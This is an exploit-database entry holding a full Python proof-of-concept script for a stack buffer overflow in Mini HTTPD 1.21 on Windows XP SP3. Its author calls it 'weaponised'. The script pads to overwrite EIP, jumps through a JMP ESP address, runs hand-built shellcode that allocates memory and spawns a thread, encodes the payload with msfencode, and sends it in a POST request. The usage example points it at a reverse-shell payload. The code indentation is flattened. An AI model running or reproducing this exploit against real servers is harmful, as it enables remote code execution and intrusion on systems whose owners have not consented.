Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit

:
25.02.2014
:
Mini HTTPD 1.21
:

#!/usr/bin/python
#
# Title: Mini HTTPD stack buffer overflow POST exploit
# Author: TheColonial
# Date: 20 Feb 2013
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Vendor Homepage: http://www.picolix.jp/
# Version: 1.21
# Tested on: Windows XP Professional SP3
#
# Description:
# This is a slightly more weaponised version of the Mini HTTPD buffer overflow
# written by Sumit, located here: http://www.exploit-db.com/exploits/31736/
# I wrote this up because the existing version had a hard-coded payload and
# didn't work on any of my XP boxes.
#
# The instability of the existing is down to bad chars, and the parent thread
# killing off the child thread when the thing is still running. This exploit
# allocates memory in a safe area, copies the payload to it, creates a new
# thread which runs the payload and then suspends the current thread. The
# suspending of the thread forces the parent to kill it off rather than let
# it crash and potentially bring the process down.
#
# Run the script without arguments to see usage.

import struct, socket, sys, subprocess

# Helper function that reads the body of files off disk.
def file_content(path):
with open(path, 'rb') as f:
return f.read()

# Sent the payload in the correct format to the target host/port.
def pwn(host, port, payload):
print "[*] Connecting to {0}:{1}...".format(host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Connected, sending payload {0} bytes...".format(len(payload))
payload = "POST /{0} HTTP/1.1\r\nHost: {1}\r\n\r\n".format(payload, host)
s.send(payload)
s.shutdown
s.close
print "[+] Payload of {0} bytes sent, hopefully your shellcode executed.".format(len(payload))

# Create the part of the payload creates a thread to run the final payload in.
def create_payload_thread(final_payload_size):
VirtualAlloc = struct.pack("<L", 0x7c809AE1) # in kernel32
CreateThread = struct.pack("<L", 0x7c8106c7) # in kernel32
SuspendThread = struct.pack("<L", 0x7c83974A) # in kernel32

payload = ""
payload += "\x83\xec\x02" # add esp, 0x2 (aligns the stack)
payload += "\x89\xe6" # mov esi, esp
payload += "\x83\xc6\x00" # add esi, <some offset filled later>
count_offset = len(payload) - 1

# zero out ebx because we use zero a lot
payload += "\x31\xdb" # xor ebx,ebx

# allocate some memory to store our shellcode in which is
# away from the current active area and somewhere safe
payload += "\x6a\x40" # push 0x40
payload += "\x68\x00\x30\x00\x00" # push 0x3000
payload += "\x68\x00\x10\x00\x00" # push 0x1000
payload += "\x53" # push ebx
payload += "\xB8" + VirtualAlloc # mov eax,<address>
payload += "\xff\xd0" # call eax

# copy the payload over to the newly allocated area
size_bin = struct.pack("<L", final_payload_size + 4)
payload += "\xb9" + size_bin # mov ecx,final_payload_size
payload += "\x89\xc7" # mov edi,eax
payload += "\xf2\xa4" # rep movsb

# create the thread with a starting address pointing to the
# allocated area of memory
payload += "\x53" # push ebx
payload += "\x53" # push ebx
payload += "\x53" # push ebx
payload += "\x50" # push eax
payload += "\x53" # push ebx
payload += "\x53" # push ebx
payload += "\xB8" + CreateThread # mov eax,<address>
payload += "\xff\xd0" # call eax

# We call SuspendThread on the current thread, because this
# forces the parent to kill it. The bonus here is that doing
# so prevents the thread from dying and bringing the whole
# process down.
payload += "\x4b" # dec ebx
payload += "\x4b" # dec ebx
payload += "\x53" # push ebx
payload += "\xB8" + SuspendThread # mov eax,<address>
payload += "\xff\xd0" # call eax
payload += "\x90" * 4

# fill in the correct offset so that we point ESI to the
# right location at the start of the final payload
size = len(payload) + final_payload_size % 4

print "[*] Final stage is {0} bytes.".format(final_payload_size)

offset = struct.pack("B", size)

# write the value to the payload at the right location and return
return payload[0:count_offset] + offset + payload[count_offset+1:len(payload)]

# Creates the first stage of the exploit which overwrite EIP to get control.
def create_stage1():
eip_offset = 5412
jmp_esp = struct.pack("<L", 0x7e4456F7) # JMP ESP in advapi32

eip_offset2 = eip_offset + 4

payload = ""
payload += "A" * eip_offset # padding to reach EIP overwrite
payload += jmp_esp # address to overwrite IP with
payload += "\x90" # alignment
payload += "\x83\xEC\x21" # rejig ESP
return payload

# Create encoded shellcode from the given payload.
def create_encoded_shellcode(payload):
print "[*] Input payload of {0} bytes received. Encoding...".format(len(payload))
params = ['msfencode', '-e', 'x86/opt_sub', '-t', 'raw',
'BufferRegister=ESP', 'BufferOffset=42', 'ValidCharSet=filepath']
encode = subprocess.Popen(params, stdout = subprocess.PIPE, stdin = subprocess.PIPE)
shellcode, _ = encode.communicate(payload)
print "[*] Shellcode of {0} bytes generated.".format(len(shellcode))
return shellcode

print ""
print "MiniHTTPd 1.21 exploit for WinXP SP3 - by TheColonial"
print "-----------------------------------------------------"
print ""
print " Note: msfencode must be in the path and Metasploit must be up to date."

if len(sys.argv) != 4:
print ""
print " Usage: {0} <host> <port> <payloadfile>".format(sys.argv[0])
print ""
print " host : IP/name of the target host."
print " port : Port that the target is running on."
print " payloadfile : A file with the raw payload that is to be run."
print " This should be the raw, non-encoded output of"
print " a call to msfpayload"
print ""
print " eg. {0} 192.168.1.1 80 reverse_shell_raw.bin"
print ""
else:
print ""
print " Make sure you have your listeners running!"
print ""

host = sys.argv[1]
port = int(sys.argv[2])
payload_file = sys.argv[3]
stage1 = create_stage1()
final_stage = file_content(payload_file)
thread_payload = create_payload_thread(len(final_stage))
shellcode = create_encoded_shellcode(thread_payload + final_stage)
padding = "A" * 0x10
pwn(host, port, stage1 + shellcode + padding)

CAPTCHA